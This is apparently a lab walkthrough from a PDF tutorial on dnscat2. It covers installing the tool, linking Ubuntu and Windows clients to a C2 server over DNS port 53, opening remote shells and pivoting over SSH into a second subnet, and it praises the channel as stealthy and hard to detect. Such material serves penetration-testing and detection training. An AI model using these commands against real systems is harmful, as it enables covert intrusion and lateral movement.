Contents

Introduction to DNS ............................................................................... 3

Page 2 of 14
Introduction to DNS
The Domain Name System (DNS) associates URLs with their IP address. With DNS, it’s possible to type
words rather than a series of numbers into a browser, enabling individuals to look for sites and send
messages utilizing commonplace names. When you look for the domain name in a browser, it sends a
question over to the DNS server to coordinate the domain with its IP. When found, it utilizes the IP to
recover the site’s content. Most astonishingly, this entire procedure takes just milliseconds. For all this
work, it uses port 53.

Introduction to DNScat
DNScat is such a praised tool because it can create a command and control tunnel over the DNS protocol,
which lets an attacker work in stealth mode. You can access any data along with uploading and
downloading files and getting a shell. For this tool to work over 53 port, you don’t need to have
authoritative access to a DNS server. You can just simply establish your connection over port 53 and it will
be faster and it will still be sensed as usual traffic. But it makes its presence well known in the packet log.

A DNScat is made up of two components, i.e. a server and a client. To know the working of dnscat, it is
important to understand both of these components.

The client is intended to be kept running on a target machine. It's written in C and has the fewest
prerequisites.When you run the client, you regularly indicate a domain name. All packets will be sent to
the local DNS server, which will then direct them to the legitimate DNS server for that domain (which you,
apparently, have control of).

The server is intended to be kept running as a definitive DNS server. It’s developed in ruby and relies upon
a few distinct gems. When you run it, just like the client, you specify which domain(s) it listens to.When it
gets traffic for one of those domains, it endeavours to set up a legitimate association. If it gets other traffic,
it will automatically disregard it, but, however, it can also advance it upstream.

Installation
Run the following git command to download dnscat2:

git clone https://github.com/iagox86/dnscat2.git

Now install bundler as it is a major dependency for dnscat2. To install bundler go into the server of dnscat2
and type:

Page 3 of 14
 cd dnscat2/
cd server/
gem install bundler
bundle install

Once everything is done, the server will run with the following command:

ruby dnscat2.rb

Similarly, download dnscat2 in the client machine too. And use make command to compile it with the
server, as shown in the image below:

Page 4 of 14
 git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/
cd client/
make

To establish a connection between client and server, use the following command:

./dnscat --dns=server=192.168.0.102,port=53

You can check the successful creation of the session in Wireshark too. In real life scenarios, port 53 plays
a huge role in getting reverse shell because port 53 is seldom blocked by security devices, and plus, in
scenarios where a system hosts more than one NIC card, traffic from both the cards travels through a
single DNS.

Page 5 of 14
Once the connection is established, you can see on the server-side that you will have a session as shown
in the image below. You can use the command "sessions" to check for a session that has been created.
Now, here we can play around with many options, all of which are available under the "help" category.

New window created: 1

Now, to interact with the said session type the following command:

session -i 1

Page 6 of 14
We can access the session now and interact with many of the options available. Let’s try interacting with
the Ubuntu system using the command:
Sure enough, this will create a new session 2 and upon interacting with the said session, we’ll have a
traditional shell.

shell
session -i 2
uname -a
ifconfig

Page 7 of 14
Page 8 of 14
DNS Tunnelling
The important thing to note here is that the client system clearly has two NIC cards installed, and the IP
ranges are different on both. So, traditionally, a system present in the first IP
range 192.168.0.0/24 won’t be able to communicate with a system present in the second IP
range 192.168.205.0/24

Here, we performed reconnaissance and found one more system in the range of 192.168.205.0/24 with
IP address 192.168.205.131 and forwarded this system’s port 22 to the client’s port 8888 to create a
DNS tunnel between the two systems using the command shell we had obtained in previous steps.

Now, using our server, we try to log into the system with IP address 192.168.205.131. Here, we know the
credentials of the system at IP 192.168.205.131 so we log indirectly.

ssh msfadmin@127.0.0.1 -p 8888

And as we can see, we are able to communicate with the system comfortably.

Page 9 of 14
 The same can be done easily for a window’s client too. Follow the link here to download a suitable
dnscat2 client for your system of windows. The latest client of dnscat for windows is marked in the
snapshot below for reference.

Page 10 of 14
We’ll perform the same steps as we did initially on the Ubuntu client while running dnscat and run the
following command:

dnscat2-v0.07-client-win32.exe --dns=server=192.168.0.102, port=53

And finally, we see session-established status in the window. When we refresh our server’s dnscat2
console, we see a new session is created. To interact with it we use the command:

Page 11 of 14
 session -i 1

Following it with the command:

shell

We would see a new session is now created as in the previous case of a Linux system. We interact with it
using the following command:

session -i 2
systeminfo

And a brand new Windows shell gets opened!

Page 12 of 14
Page 13 of 14
Conclusion
Even in the most confined situations, DNS traffic ought to be permitted to determine an inner or outer
network. This can be utilized as a correspondence channel between an objective host and the command
and control server. Command and information are contained inside DNS inquiries and identification. That
is why detection is troublesome since the arbitrary command is hidden in plain sight due to it being
perceived as legitimate traffic. And this is exactly what DNSCat takes advantage of, making it a successful
tool to attack.

Page 14 of 14